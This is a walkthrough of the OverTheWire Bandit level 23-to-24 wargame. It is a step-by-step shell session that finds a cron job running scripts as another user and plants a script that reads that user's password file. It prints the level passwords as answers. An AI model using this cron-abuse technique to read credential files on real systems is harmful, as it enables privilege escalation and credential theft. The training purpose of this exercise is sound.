Level Goal
A program is running automatically at regular intervals from cron, the time-based job scheduler.
Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

Commands you may need to solve this level
cron, crontab, crontab(5) (use “man 5 crontab” to access this)
------------------------------------------------------------------------------------------------------------------------------------------------------------------
[# Step 1]
>  ~ ssh bandit23@bandit.labs.overthewire.org -p 2220
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit23@bandit.labs.overthewire.org's password:
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

[# Step 2]
bandit23@bandit:~$ cd /etc/cron.d

[# Step 3]
bandit23@bandit:/etc/cron.d$ ls -la
total 36
drwxr-xr-x  2 root root 4096 May 14 14:04 .
drwxr-xr-x 87 root root 4096 May 14 09:41 ..
-rw-r--r--  1 root root   62 May 14 13:40 cronjob_bandit15_root
-rw-r--r--  1 root root   62 May 14 14:03 cronjob_bandit17_root
-rw-r--r--  1 root root  120 May  7 20:14 cronjob_bandit22
-rw-r--r--  1 root root  122 May  7 20:14 cronjob_bandit23
-rw-r--r--  1 root root  120 May 14 09:41 cronjob_bandit24
-rw-r--r--  1 root root   62 May 14 14:04 cronjob_bandit25_root
-rw-r--r--  1 root root  102 Oct  7  2017 .placeholder

[# Step 4]
bandit23@bandit:/etc/cron.d$ cat cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null

[# Step 5]
bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done

[# Step 6]
bandit23@bandit:/etc/cron.d$ mkdir /tmp/myname123

[# Step 7]
bandit23@bandit:/etc/cron.d$ chmod 777 /tmp/myname123

[# Step 8]
bandit23@bandit:/etc/cron.d$ cd /tmp/myname123

[# Step 9]
bandit23@bandit:/tmp/myname123$ vim index.sh
------------------------------------------------------------------------------------------
Inside Vim’s Editor:

1 #!/bin/bash
2 cat /etc/bandit_pass/bandit24 > /tmp/myname123/bandit24password
~
~
/tmp/myname123/index.sh [dec= 99] [hex=63] [pos=0002:0001][100% of 2]
:wq
-----------------------------------------------------------------------------------------
After exiting Vim’s Editor:

[# Step 9 (Continued)]
bandit23@bandit:/tmp/myname123$ cat index.sh
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/myname123/bandit24password

[# Step 10]
bandit23@bandit:/tmp/myname123$ chmod 777 index.sh

[# Step 11]
bandit23@bandit:/tmp/myname123$ cp index.sh /var/spool/bandit24/

[# Step 12]
bandit23@bandit:/tmp/myname123$ ls
bandit24password  index.sh

[# Step 13]
bandit23@bandit:/tmp/myname123$ cat bandit24password
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

[# Step 14]
bandit23@bandit:/tmp/myname123$ rm -rf /tmp/myname123

[# Step 15]
bandit23@bandit:/tmp/myname123$ exit
logout
Connection to bandit.labs.overthewire.org closed.
